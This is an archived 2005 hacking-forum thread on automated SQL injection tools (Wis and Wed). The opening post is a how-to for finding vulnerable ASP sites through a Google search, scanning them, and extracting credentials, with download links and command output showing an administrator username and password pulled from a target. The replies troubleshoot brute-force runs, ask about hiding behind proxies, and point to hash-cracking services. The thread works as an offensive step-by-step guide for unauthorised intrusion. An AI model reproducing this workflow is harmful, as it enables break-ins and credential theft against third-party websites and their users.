 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 114
 Members: 0
 Total: 114
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Sql injection tools Wed&Wis |
|
 Posted: Thu Jan 13, 2005 4:02 pm |
 |
|
| qr4t |
| Regular user |
 |
|
| Joined: Nov 21, 2004 |
| Posts: 11 |
| Location: Estonia |
|
|
 |
|
 |
|
I found 2 tools to automate the sql injection process. I tested them and got some users/passwds  My tests also showed that it missed some sql injections 
Here's how to use them:
First i searched with google some asp sites like this "allinurl:/login.asp". Next i used Wis (Web Injection Scanner - searches web for sql injection) and if it found hole then i started Wed (Web Entry Detector) to exploit the injection. Tools can be downloaded from here:
http://www.hot.ee/qr4t/wis.rar
http://www.hot.ee/qr4t/wed.rar
It goes like this:
| Code: |
C:\>wis http://www.someaspsite.com/
Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com
Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please....
(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204
Injection Page Final Result:
============================
/shownews.asp?newsid=204
C:\>
|
To detect access pages, put a "/A" to the end of command:
| Code: |
C:\>wis http://www.someaspsite.com/ /A
Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com
Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....
(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp
Access Page Final Result:
============================
/gansu2/login.asp (200 OK)
Scan Finished
C:\>
|
When you successfully find Sql Injection with Wis then next step is to use Wed and the vulnerable url:
| Code: |
C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544
Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com
#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened
#### Phrase 1: Process Argv ####
Host:www.someaspsite.com
Page:/shownews.asp?newsid=1544
#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.
#### Phrase 3: Get Cookies ####
Tag: 2017
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/
#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"
#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"
#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13
#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"
#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9
#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####
name is: administrator
pwd is: admin@bvn
C:\>
|
Happy Injecting  |
|
|
|
|
|
|
a |
|
| Posted: Thu Jan 13, 2005 10:28 pm |
|
|
| SteX |
| Advanced user |
 |
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Fri Jan 14, 2005 7:08 pm |
|
|
| any2000 |
| Active user |
 |
|
| Joined: Dec 02, 2004 |
| Posts: 26 |
|
|
|
|
|
|
|
very good toolz thanks qr4t  |
|
|
|
|
|
This Tools is China Hacker rongxiao Public |
|
| Posted: Sat Jan 15, 2005 3:42 pm |
|
|
| firefox |
| Beginner |
 |
|
| Joined: Jan 15, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Jan 15, 2005 5:29 pm |
|
|
| Oguz |
| Regular user |
|
|
| Joined: Nov 29, 2004 |
| Posts: 7 |
|
|
|
|
|
|
|
|
_________________
{ [ NCT ] } |
|
|
|
| Posted: Tue Jan 18, 2005 5:35 am |
|
|
| proview |
| Beginner |
|
|
| Joined: Jan 18, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
Hi, the first of all, sorry for my very very very bad english 
Congratulations for the wis & wed programs.
I have a problem. The first step with the wis, it's ok!, an example i got this:
Page Found: /admin/login.asp (401 AuthReq)
Page Found: /admin/default.asp (401 AuthReq)
Page Found: /admin/index.asp (401 AuthReq)
Page Found: /admin/manage.asp (401 AuthReq)
Access Page Final Result:
============================
/admin/manage.asp (401 AuthReq)
/admin/index.asp (401 AuthReq)
/admin/default.asp (401 AuthReq)
/admin/login.asp (401 AuthReq)
Now, I not that to do with these results, in step 2 with the wed program 
Anyone can help me please?
Sorry one more time for my bad english |
|
|
|
|
|
What about using proxy with the wis usage ? |
|
| Posted: Tue Jan 18, 2005 3:34 pm |
|
|
| ToXiC |
| Moderator |
 |
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
|
|
|
|
| is there a -p or anything in the usage to use proxy .. ? |
|
|
|
|
| Posted: Tue Jan 18, 2005 6:09 pm |
|
|
| ToXiC |
| Moderator |
|
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
|
|
|
|
HEllo again ..i have run this expl from another pc and i have managed to get to the point where it is using brute force
| Code: | #### Phrase 7: Starting Get Password Field ####
Tag: 332
Got Password Field is "pwd"
#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 5
#### Phrase 9: Starting Brute Field "administrators" and "pwd" (Access Mode) ###
#
Brute Force "administrators": ktu' "pwd": VB?<Y "!ln=Zry(),.v&kHJaEIKb(R$),Q<S>
C:\Documents and Settings\xxxx\Desktop\wed> |
and while it is working the program crashes...any ideas y? |
|
|
|
|
|
|
|
|
| Posted: Fri Mar 18, 2005 9:53 pm |
|
|
| kunfuzed |
| Beginner |
|
|
| Joined: Mar 18, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k
user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk
I have gotten the name and password but is it hashed? I cant log in with this info! |
|
|
|
|
| Posted: Tue Mar 29, 2005 8:46 am |
|
|
| safer |
| Regular user |
|
|
| Joined: Jun 20, 2004 |
| Posts: 5 |
|
|
|
|
|
|
|
|
|
|
|
|
admin.txt |
|
| Posted: Wed Mar 30, 2005 10:32 am |
|
|
| matrix2005 |
| Beginner |
|
|
| Joined: Feb 12, 2005 |
| Posts: 3 |
|
|
|
|
|
|
|
whay i got this error admin.txt not fond ı have admin.txt in same directory can some one help me..  |
|
|
|
|
| Posted: Tue Jul 05, 2005 10:00 pm |
|
|
| petitmaitreblanc |
| Regular user |
|
|
| Joined: Jul 05, 2005 |
| Posts: 18 |
|
|
|
|
|
|
|
wis seemed don't work for me , but wed , no problem .
understand.. when I launch wis , with or without param , the program stop , without checking anything.. no error message , nothing , just stop . |
|
|
|
|
|
hashed password |
|
| Posted: Thu Jul 07, 2005 4:31 pm |
|
|
| neo_hack |
| Regular user |
|
|
| Joined: Jul 04, 2005 |
| Posts: 6 |
|
|
|
|
|
|
|
| kunfuzed wrote: | #### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k
user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk
I have gotten the name and password but is it hashed? I cant log in with this info! |
Well if the password is hashed with md5 algorthm try using this:
http://www.securitylab.ru/tools/22140.html
If it is sha1 or not salted md5 try http://passcracking.com/ |
|
|
|
|
| Posted: Thu Jul 07, 2005 6:10 pm |
|
|
| diaga |
| Regular user |
|
|
| Joined: Jun 27, 2005 |
| Posts: 22 |
|
|
|
|
|
|
|
| downloaded it, how do i use it? |
|
|
|
|
|
md5 |
|
| Posted: Thu Jul 14, 2005 12:37 pm |
|
|
| neo_hack |
| Regular user |
|
|
| Joined: Jul 04, 2005 |
| Posts: 6 |
|
|
|
|
|
|
|
md5crack xxx
xxx - type your hash here |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
